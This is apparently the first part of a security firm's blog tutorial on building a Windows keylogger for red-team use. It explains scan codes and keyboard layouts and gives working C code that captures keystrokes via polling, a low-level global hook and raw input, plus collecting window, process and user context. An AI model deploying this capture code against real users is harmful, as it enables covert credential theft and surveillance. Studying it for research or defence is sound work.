Writing a decent win32 keylogger [1/3]

Written by Martin Balc'h - 21/12/2023 - in Outils , Système - Download

In this series of articles, we talk about the ins and out of how to build a keylogger for Windows that is able to support all keyboard layouts and reconstruct Unicode characters correctly regardless of the language (excluding those using input method editors).

In the first part, after a brief introduction introducing the concepts of scan codes, virtual keys, characters and glyphs, we describe three different ways to capture keystrokes (GetKeyState, SetWindowsHookEx, GetRawInputData) and the differences between those techniques.

In the second part, we detail how Windows stores keyboard layouts information in the kbd*.dll and how to parse them.

In the third and last part, we go through the process of using the extracted information to convert scan codes into characters and all the tricky cases presented by different layouts, such as ligatures, dead keys, extra shift-states and SGCAPS.
Finally, we present our methodology to test and validate that our reconstruction is correct by writing a testing tool which can automate the injection of scan codes and retrieve the reference text produced by Windows which we compare with our reconstructed text.

Part 1 Part 2 Part 3 Github

Introduction

One of the responsibilities of Synacktiv's development team is to build and maintain offensive security tooling used by other departments during their engagements. In addition to our main projects such as KRAQOZORUS, OURSIN, DISCONET and LEAKOZORUS, we also try to fulfill smaller "R&D requests" that may be of use during specific missions.

In today's article, we will focus on such a request: building a keylogger targeting Windows that is able to properly reconstruct the characters typed, whichever keyboard layout and language are in use on the target system.

Which, as it turns out, is not as straightforward as you might think.

Key concepts and terminology

Before we start, it is important to introduce a few concepts such as scan codes, virtual keys, characters, glyph and layouts.

Scan codes

In the beginning were scan codes, they’re (single or multi) byte values produced by the keyboard firmware and are independent of the keyboard layout. Here are a few example values for a standard ANSI US keyboard:

Key Scan code                   Key Scan code
ESCAPE 0x01                   R 0x13
1 0x02                   ENTER 0x1C
2 0x03                   NUMPAD_ENTER 0xE0 0x1C
Q 0x10                   LEFT CONTROL 0x1D
W 0x11                   RIGHT CONTROL 0xE0 0x1D
E 0x12                   PAUSE 0xE1 0x1D

 

Multi-byte scan codes always start with 0xE0, 0xE1 or 0xE2 and are sometimes referred to as “extended” scan codes. In the previous example, you can see they can serve as a way to distinguish between the left control key and the right control key.

The top bit of the scan code indicates if the key is pressed (0) or released (1). When a key is pressed, we call it a make code and when it is released, it’s called a break code. So let’s say we typed “ctrl+r”, the following scan codes would be received:

0x1D    # left control is pressed
0x13    # R is pressed
0x93    # R is released
0x9D    # left control is released

More information on scan codes can be found here.

Layouts

Windows allows you to set up the system language and one or more input languages. Input language settings will impact locale, date & time formats and more importantly for our purposes, keyboard layouts. Note that Windows may offer multiple layouts for a given language, let’s see the list of French layouts:

  • French (Legacy, AZERTY)
  • French (Standard, AZERTY)
  • French (Standard, BÉPO, third-party)
  • and also French for other countries like Belgium, Canada, Switzerland, etc.

Keyboard layouts contain information about how to convert scan codes into virtual keys, and then into characters that can be displayed. We will describe their internal structures in depth later on in this article. You can explore all the keyboard layouts supported by Windows here.

Virtual keys

Virtual key codes are used by windows to identify keyboard keys in a language independent manner. There are 256 virtual key codes and the table can be found here. Let’s say we press the key ‘A’ on a French standard ISO 105 keyboard, first with an fr-FR layout (AZERTY), then with the en-US layout (QWERTY). We would get the same scan code, but it would result in a different virtual key code.

locale layout scan code virtual key
fr-FR kbdfr.dll 0x10 VK_A (0x41)
en-US kbdus.dll 0x10 VK_Q (0x51)

Characters and glyphs

In the context of this article, we call characters UTF-16-LE encoded unicode code points. Glyphs are visual representation of one or more unicode character, and will depend on the font used for display. There is an interesting case where multiple unicode characters can be represented by a single glyph, this is called a ligature.

Now that we got all that out of the way, let’s see how we can go about recording keystrokes.

Recording keystrokes

While there are quite a few ways to record keystrokes, we will only focus on well known user-land techniques in this article. In all the following code snippets, we call the same function called process_kbd_event which we define thusly:

void process_kbd_event(
    uint8_t sc,         // (virtual) scan code
    bool    e0,         // is the E0 extended flag set?
    bool    e1,         // is the E1 extended flag set?
    bool    keyup,      // is the event a key press (0) or release (1)
    uint8_t vk          // virtual key associated to the key event
);

This is where we will handle all the processing that follows key presses capture and handle the reconstruction of character streams.

GetKeyState

The first technique we will describe uses the function GetKeyState which is provided by user32.dll and defined in winuser.h. It allows to retrieve the current state for a specified input virtual key.

SHORT GetKeyState(int nVirtKey);

This function works at a higher level (virtual keys) than the two following techniques which work at the scan code level. However we can use the function MapVirtualKeyA to get the scan codes that originated the virtual key press or release. To record keystrokes with this function, you need to call it repeatedly for all 256 virtual keys values, keep that state in memory and then call it back again a bit later and compare to the current status. Whenever the state change, it means a key was pressed or released. You could also use GetKeyboardState or GetAsyncKeyState to achieve the same results. Here is a working example snippet to capture key strokes with GetKeyState:

// we start by defining a function to retrieve all virtual key states
void get_kb_state(short kbs[256])
{
    for(int i=0; i<256; i++)
        kbs[i] = GetKeyState(i);
}

int main()
{
    short kbs_last[256] = {};
    get_kb_state(kbs_last);

    while(1)
    {
        short kbs[256] = {};
        get_kb_state(kbs);

        for(int i=0; i<256; i++)
            if(kbs[i] != kbs_last[i])
            {
                // the virtual key with value "i" was toggled
                // get a "virtual scan code" for this virtual key
                int vsc = MapVirtualKeyA(i, MAPVK_VK_TO_VSC_EX);
                int e0 = ((vsc >> 8) & 0xff) == 0xe0;   // e0 ?
                int e1 = ((vsc >> 8) & 0xff) == 0xe1;   // e1 ?
                int sc = vsc & 0xff;                    // mask eventual scan code flags
                int up = (kbs[i] & 0xc0000000) == 0;    // check top bits to know if a key was pressed or released

                process_kbd_event(sc, e0, e1, up, i);
            }

        memcpy(kbs_last, kbs, sizeof(kbs_last));
        Sleep(5);
    }
}

Note: there is a side effect of working with virtual keys instead of scan codes here that requires additional code: the distinction between left/right/undifferentiated modifier keys such as CONTROL, SHIFT and ALT. For each of these, Windows has 3 virtual keys: VK_CONTROL which is triggered by both left (VK_LCONTROL) and right (VK_RCONTROL) control keys. The same is true for VK_MENU (alt key) and VK_SHIFT (shift key).

Note: In order not to consume too much CPU, we insert a sleep of 5 milliseconds. This value can be increased or lowered as desired but keep in mind that if a key is pressed and released in a shorter time than the polling interval, the program will miss the event!

So using the sample capture code, a press on a control (or alt or shift) key will trigger two process_kbd_event: one for the generic VK_CONTROL virtual key, and one for the ‘handed’ version. So you probably want to filter out the generic virtual keys and only process the specific left/right versions.

SetWindowsHookEx

Another technique that can be used to retrieve key-presses is the use of a “global windows hook”. There are many types of hooks you can set up with SetWindowsHookEx but we’ll focus only on WH_KEYBOARD_LL. We’ll mention another one, which doesn’t give as much information on key-presses: WH_KEYBOARD. Here is the prototype of the function:

HHOOK SetWindowsHookExA(
  [in] int       idHook,
  [in] HOOKPROC  lpfn,
  [in] HINSTANCE hmod,
  [in] DWORD     dwThreadId
);

Additionally, windows hooks can work in two modes “global” or “thread”. When working with a thread based hook, the callback to process the event needs to be packaged as a dll which will be injected into the processes which are hooked, which is something we would rather avoid.

Low level hooks, suffixed with “_LL” can only run in global mode and don't have that restriction. Which means you can pass NULL values for hmod and dwThreadId.

To receive the low level keyboard events, you need to give a callback and then process window event messages. Here is a working example of retrieving the key-presses with this method:

// the callback receiving SetWindowsHookEx WH_KEYBOARD_LL events
LRESULT CALLBACK LowLevelKeyboardProc(int code, WPARAM wparm, LPARAM lparm)
{
    PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT)lparm;
    process_kbd_event(p->scanCode,
        p->flags & LLKHF_EXTENDED,
        0,
        p->flags & LLKHF_UP,
        p->vkCode
    );
    return CallNextHookEx(NULL, code, wparm, lparm);
}

int main()
{
    // register the hook
    HHOOK hhkLowLevelKybd = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, NULL, 0);
    // pump windows events
    MSG msg;
    while(GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    UnhookWindowsHookEx(hhkLowLevelKybd);
    return 0;
}

GetInputData

The final technique we will describe in this article uses direct input APIs, to retrieve events as keys are pressed. This method requires a little bit more work to set up:

  • you need to register a custom window class with RegisterClassExA first,
  • then you use CreateWindowExA to instanciate a window which will be used to process input events,
  • you can now call RegisterRawInputDevices to specify a generic (0x01) keyboard (0x06), specify the RIDEV_INPUTSINK flag and finally the target window that will receive the events,
  • then you need a window proc callback that handles WM_INPUT events,
  • you can finally start a message processing loop that uses GetMessage, TranslateMessage and DispatchMessage to start receiving the keyboard events.

The assembled sample code looks like this:

// to receive events for the rawkeyboard data
LRESULT CALLBACK wndproc(HWND window, UINT message, WPARAM wparam, LPARAM lparam)
{
    if(message != WM_INPUT)
        return DefWindowProc(window, message, wparam, lparam);

    char rid_buf[64];
    UINT rid_size = sizeof(rid_buf);

    if(GetRawInputData((HRAWINPUT)lparam, RID_INPUT, rid_buf, &rid_size, sizeof(RAWINPUTHEADER)))
    {
        RAWINPUT * raw = (RAWINPUT*)rid_buf;
        if(raw->header.dwType == RIM_TYPEKEYBOARD)
        {
            RAWKEYBOARD * rk = &raw->data.keyboard;
            process_kbd_event(rk->MakeCode,
                rk->Flags & RI_KEY_E0,
                rk->Flags & RI_KEY_E1,
                rk->Flags & RI_KEY_BREAK,
                rk->VKey
            );
        }
    }
    return DefWindowProc(window, message, wparam, lparam);
}

int main(void)
{
    //define a window class which is required to receive RAWINPUT events
    WNDCLASSEX wc;
    ZeroMemory(&wc, sizeof(WNDCLASSEX));
    wc.cbSize        = sizeof(WNDCLASSEX);
    wc.lpfnWndProc   = wndproc;
    wc.hInstance     = GetModuleHandle(NULL);
    wc.lpszClassName = "rawkbd_wndclass";

    // register class
    if(!RegisterClassExA(&wc))
        return -1;

    // create window
    HWND rawkbd_wnd = CreateWindowExA(0, wc.lpszClassName, NULL, 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, GetModuleHandle(NULL), NULL);
    if(!rawkbd_wnd)
        return -2;

    // setup raw input device sink
    RAWINPUTDEVICE devs = { 0x01 /* generic */, 0x06 /* keyboard */, RIDEV_INPUTSINK, rawkbd_wnd };
    if(RegisterRawInputDevices(&devs, 1, sizeof(RAWINPUTDEVICE)) == FALSE)
        return -3;

    MSG msg;
    while(GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    // cleanup
    DestroyWindow(rawkbd_wnd);
    UnregisterClass(wc.lpszClassName, GetModuleHandle(NULL));
    return 0;
}

I personally prefer this method over the other two since it works at a lower level, it avoids global windows hooks and it does not require to repeatedly call a very noticeable function. By the way, you should not trust the RAWKEYBOARD->VKey values as in some cases they are just wrong (ex: pressing ALT-GR with a French layout will produce the VK_CONTROL virtual key) while the scan codes are correct.

Retrieving the context

We presented three methods to retrieve the key strokes, but in order to reconstruct the character streams, we will need some context information. Additionally, to build a decent keylogger we will need more information such as the current window’s title and process, the current username, timestamps and so on.

The first thing to do is to retrieve a handle to the current active window since it’s the one that will receive the keypresses. We then want to retrieve the id of the thread responsible to handle that window, which allows us to call HKL GetKeyboardLayout(HANDLE thread_id); to retrieve a handle to the keyboard layout used by the active window’s thread. This is how you can do it:

HWND hwnd = GetForegroundWindow();
DWORD thid = GetWindowThreadProcessId(hwnd, NULL);
HKL hkl = GetKeyboardLayout(thid);

To retrieve the process id you can first use OpenThread() with THREAD_QUERY_INFORMATION and then call GetProcessIdOfThread() which will return the pid. From the PID you can get the process name by enumerating running processes with CreateToolhelp32Snapshot, Process32First, and Process32Next. Other useful functions to get context information include GetSystemTime(), GetWindowTextA(), GetUserNameA(), etc.

Note: Console programs don’t spawn or run their own graphic window as it is handled by conhost.exe so the GetKeyboardLayout() call will fail with this example.

 

In the next article, we will cover how to parse Windows' keyboard layout DLLs to be able to emulate its scan code to character translation process.